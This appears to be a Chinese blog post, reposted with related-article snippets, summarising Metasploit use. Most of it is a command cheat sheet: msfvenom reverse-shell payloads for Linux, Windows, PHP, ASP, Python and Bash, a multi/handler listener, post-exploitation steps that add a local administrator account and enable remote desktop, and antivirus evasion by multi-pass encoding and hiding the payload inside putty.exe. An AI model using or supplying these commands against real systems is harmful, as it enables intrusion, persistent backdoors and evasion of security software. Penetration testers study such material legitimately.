Msf小结

最新推荐文章于 2022-06-28 19:18:38 发布
最新推荐文章于 2022-06-28 19:18:38 发布
阅读量238 收藏
点赞数
文章标签: shell php python
原文链接:http://www.cnblogs.com/ihacker/p/11420661.html
版权

Msfvenom是有效负载生成和编码的组合。

生成攻击载荷

Linux下反弹Meterpreter shell

1
 
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=<your port to connect on> -e -f elf -a x86 --platform linux -o shell

C反弹shell

1
 
msfvenom -p windows/shell_reverse_tcp LHOST=<your IP Address> LPORT=<your port to connect on> -b "\x00\x0a\x0d" -a x86 --platform win -f c

Python反弹shell

1
 
msfvenom -p cmd/unix/reverse_python LHOST=<your IP Address> LPORT=<your port to connect on> -o shell.py

Asp反弹shell

1
 
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp -a x86 --platform win -o shell.asp

Bash反弹shell

1
 
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.sh

PHP反弹shell

1
 
msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw -o shell.php

Windows反弹shell

1
 
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -a x86 --platform win -o shell.exe

64位系统要加x64

1
 
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -a x86 --platform win -o shell.exe

Windows提权

第一步生成Windows攻击载荷

1
 
msfvenom -p windows/meterpreter/reverse_tcp lhost=本机IP -f exe >/home/shell.exe

第二步MSF监听

1
2
3
4
5
6
 
use exploit/multi/handler                       //设置模块
set payload windows/meterpreter/reverse_tcp         //配置payload
show options	//显示选项
set LHOST 本机IP	//设置ip地址,注意,这个要与上面攻击载荷里面的相同
set LPORT 端口		//设置端口,这个也要相同
exploit //执行攻击

第三步提权

1
2
3
4
5
6
7
 
shell              //进入终端
net user            //查看用户
net user admin admin /add		//创建一个admin用户
net localgroup administrators admin /add	//提权
net user admin	//admin用户的信息
exit //退出bash终端
run getgui -e //开启3389端口

第四步开启远程连接

1
2
3
4
 
开启远程桌面
run post/windows/manage/enable_rdp
连接
rdesktop -u 用户名 -p 密码

免杀

多次编码免杀

1
 
msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.80.12 LPORT=443 -e x86/shikata_ga_nai-i5 -f exe -o /var/www/html/reverse_http_encode.exe

自定义二进制代码的文件模板免杀

1
 
msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.80.12 LPORT=443 -e x86/shikata_ga_nai-i5 -x ~/putty.exe

转载于:https://www.cnblogs.com/ihacker/p/11420661.html

weixin_30241919
关注
【神兵利器】——180、MSF基本介绍
Fly_鹏程万里
10-16 16
Metasploit最初是由HD Moore所开发和孕育的,当时HD只是一个安全公司的雇员,当他意识到他的绝大多数时间是在用来验证和处理那些公开发布的渗透代码时,他便开始为编写和开发渗透代码构建一个灵活且可维护的框架平台,2003年10月他发布了他的第一个基于Perl语言的Metasploit版本,当时一共集成了11个渗透攻击模块,随后在2009年的秋季Metasploit被漏洞扫描领域的一家领军企业Rapid7公司收购,Rapid7公司允许HD来招募一支团队专注于Metasploit框架的开发,自从被收购
【神兵利器】——187、MSF远程桌面
最新发布
Fly_鹏程万里
10-16 20
在渗透测试中如果我们获取到了目标服务器的权限,此时我们可以考虑查看当前服务器是否有开启远程桌面,如果有开启远程桌面则可以通过图形化界面的方式进行远程操作,更加便捷,更加迅速,如果没有开启远程桌面,那么我们可以通过获取到的shell来执行命令开启远程桌面,随后进行利用。
MSFVENOM学习总结
05-10 215
MSFVENOM常规选项 1. –p (- -payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -payload-options 列出payload选项) 2. –l ...
MSF学习笔记
mohanhan
06-24 396
使用MSF生成木马_入侵win7 1 生成木马 先通过kali自带功能生成一个木马(123.exe) -f 输出格式 -o 输出地址 生成木马一般需要点时间 2 启动msf msfconsole 然后进行设置攻击参数&&启动攻击 3 让123.exe在目标机器执行 模拟黑客或是社工手法(这里方法多种多样),让木马文件123.exe在目标win7上运行 4 查看监听回显数据 木马已经运行了,现在返回msf 查看,发现建立了一条会话,查看下windows系统信息 5 后续操作 截取
Metasploit学习总结
leeham的博客
12-03 927
Metasploit学习总结 最近需要利用metasploit工具找到”针对win732攻击成功、拿到shell并且能够上传文件“的exploit。实现过程中对Metasploit框架有所了解,总结如下。 METASPLOIT基础入门 Metasploit的基本使用 Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强...
MSF使用总结
qq_44657899的博客
09-25 4635
文章目录生成小马文件运行小马维持会话 生成小马文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=服务器IP LPORT=服务器监听端口 -f exe -o test.exe 生成的小马在root目录下 运行小马 // 进入msf msfconsole // 监听 use exploit/multi/handler // 设置payload set payload windows/meterpreter/reverse_tcp // 设置 s
msf内网渗透
10-29
小结与交流 最后,作者以谦逊的态度邀请同行进行技术交流,这体现了网络安全领域中积极分享与学习的文化。同时,提醒读者注意,此类操作仅限于合法授权的渗透测试场景下使用,不得用于非法入侵或破坏他人网络系统...
MSF后渗透总结
qq_51550750的博客
06-28 1305
MSF后渗透总结
kali总结——MSF
haoaaao的博客
04-04 528
0x00 简介 1、简介 2、msf模块 0x01 MSF使用 1、使用前先升级msfupdata 2、 0x02 MSF控制台命令 0x03 exploit模块 0x04 meterpreter基本命令和python扩展 0x05 msfcli 0x06 msf信息收集 0x07 msf弱点扫描 0...
学习metasploit漏洞总结
NS的博客
10-26 2248
学习metasploit漏洞利用总结(一)实验准备 vm虚拟机 kali 以及目的主机,我选取的是xp系统。这里可以将xp系统的防火墙关掉,或者找专门做靶机的系统。安装过程在这里不过多叙述,我的安装道路非常坎坷,有时间会总结成另一篇文,这里就先总结开始学习的一部分。 1.打开两个系统,查询他们的ip地址,互相ping,看是否可以ping通,如果ping通可以继续下面的操作。 这里面在k
详尽的msf——meterpreter——渗透测试教程
热门推荐
qq_42882717的博客
03-21 2万+
详尽的msf——meterpreter——渗透测试教程,如何使用,如何前中后期做渗透测试
msf生成windows后门程序
Deeeelete的博客
02-04 2879
进入文件夹,我们先要把我们需要制作后门程序的正常exe文件拖进去 在此处打开终端,确保该路径存在这个exe文件! 输入命令 msfvenom -a x86 --platform widows -p windows/meterpreter/reverse_tcp LHOST=192.168.132.133 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i ...
MSF生成meterpreter及静态免杀
渗透笔记
01-26 5556
1.静态免杀 1.1编译c文件,静态免杀 1.1.1 生成shellcode 在kali命令行输入 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '/x00' lhost=192.168.1.160 lport=7777 -f c -o /home/shell/test01.c -
msf常用命令
u012980075的博客
10-10 1046
msf常用命令 获取 Windows 明文用户名密码 git clone https://github.com/gentilkiwi/mimikatz.git load mimikatz privilege::debug sekurlsa::logonPasswords full Python shell python -c "import pty;pty.spawn('...
MSF生成一个木马与使用
lx1315998513的博客
03-27 1万+
原理: 利用msf模块中的msfvenom模块,首先生成.exe木马文件,用测试机打开,攻击成功后,就渗透到了靶机系统中。 准备: 目标:win7 x64专业版 攻击主机:Kali IP:192.168.1.143 生成: 生成test.exe木马文件 Step1:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1...
kali linux渗透入门(3)
leaon的博客
08-31 473
利用 Msfvenom 生成木马,实现远程控制 1.针对不同的系统 输入不同的命令,可以在 reverse_tcp 后加上 -e x86/shikata_ga_nai -i 5 -b '0x00' 作为混淆编码,5为编码次数,次数越高可以躲掉部分杀毒软件。 Linuxmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP...
msf脚本
05-24
MSF(Metasploit Framework)是一个开源的安全漏洞检测和攻击的工具包,它可以帮助安全研究人员和渗透测试人员进行漏洞探测、漏洞利用和后渗透测试等多种操作。MSF中的脚本是一种自动化的攻击工具,可以快速地执行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值